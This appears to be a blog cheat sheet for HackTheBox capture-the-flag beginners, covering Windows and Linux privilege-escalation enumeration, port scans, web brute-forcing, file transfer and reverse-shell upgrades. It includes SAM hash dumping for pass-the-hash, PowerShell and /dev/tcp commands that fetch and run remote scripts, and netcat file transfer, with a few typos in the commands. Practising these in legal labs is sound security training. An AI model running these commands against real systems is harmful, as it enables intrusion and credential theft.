HackTheBox Beginner’s Guide

CTF Hack The Box No Comments
Windows Enumeration

1. Run systeminfo to find info about running operating system, service pack and installed hotfixes, then find:
   exploits
    $ searchsploit, https://www.exploit-db.com/:
   precompiled exploits
    - https://github.com/abatchy17/WindowsExploits
    - https://github.com/SecWiki/windows-kernel-exploits
   hotfixes exploits
    https://github.com/rasta-mouse/Sherlock
2. net users, net user username

3. C:\Windows\System32\config\SAM and  C:\Windows\System32\config\SYSTEM 
   $ samdump2 SYSTEM SAM to dump hashes from sam and system then cracked with john/hashcat or directly used with Pass The Hash(pth-curl,pth-net,pth-rpcclient,pth-smbclient,pth-smbget,pth-sqsh,pth-winexe,pth-wmic,pth-wmis)
   https://blog.ropnop.com/practical-usage-of-ntlm-hashes/

4. check installed programs in C:\Program Files and other places

cheatsheet
https://guif.re/windowseop

Linux Enumeration

1. $ cat /etc/passwd for existing users, check home directories and files owned by those users.

2. $ sudo -l, if you can run a binary/script with sudo

3. $ find / -perm -4000 2>/dev/null check for SUID files

4. $ cat /etc/crontab or crontab -l any cron jobs running?
   pspy tool https://github.com/DominicBreuker/pspy/releases to find any binary/scripts that are being run repeatedly.

5. LinEnum.sh https://github.com/rebootuser/LinEnum, -t argument for more thorough test.

6. GTFObins https://gtfobins.github.io search info here which will help to escalate privileges.

7. linpeas.sh
    $ linpeas -a > /dev/shm/linpeas.txt
    $ less -r /dev/shm/linpeas.txt

    cheatsheet https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/
Port Scan

$ masscan -p1–65535,U:1–65535 10.10.10.10 — rate=1000 -e tun0

$ nmap -A 10.10.10.10

SYN scan $ nmap -sCSV 10.10.10.10 -oA synscan
TCP SYN/ACK scan $ nmap -sTV -p- -Pn 10.10.10.10 -oA fulltcp
UDP scans for SNMP, tftp etc. $ nmap -sU 10.10.10.10 -oA udpscan

$ nmap -sC -sV -O -o res 10.10.10.10
Web

dirb, dirsearch, gobuster, wfuzz
$ gobuster -u http://10.10.10.xxxx -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x txt,php,html

https://wfuzz.readthedocs.io/en/latest/
Burpsuite

File Transfer

$ nc -lvnp 1234 > out.fil
$ nc 10.10.10.10 1234 < in.file

$ php -S 127.0.0.1:80
$ python3 -m http.server
$ python -m SimpleHTTPServer 80

$ wget/curl
C:\certutil.exe -f -split -urlcache http://10.10.10.10/nc.exe C:\Windows\Temp\nc.exe
C:\powershell.exe (New-Object System.Net.WebClient).DownloadFile(“http://10.10.10.10/nc.exe”, “C:\Windows\Temp\nc.exe”)
C:\powershell.exe IEX(New-Object System.Net.WebClient).DownloadString(‘http://ip/script.ps1')

without wge
$ nc -q 5 -lvnp 80 < linpeas.sh
$ cat < /dev/tcp/10.10.10.10/80 | sht/curl

SMB method:
Svr: $ impacket-smbserver test /root/dir_to_share
Client: C:\copy \\svr_ip\test\filename.exe
Reverse-Shell

fully interactive TTY shell:
you get reverse shell but not tty shell, run: python -c ‘import pty; pty.spawn(“/bin/bash”)’ hit CTRL-z,  type “stty raw -echo “ and enter, type “fg” and enter. (input cannot be seen after hitting stty command so simply type fg and enter).

for windows 
$ apt install rlwrap -y
Usage: $ rlwrap nc -lnvp 4444

Proudly powered by WordPress & Skyrocket Themes

MENU

Navigation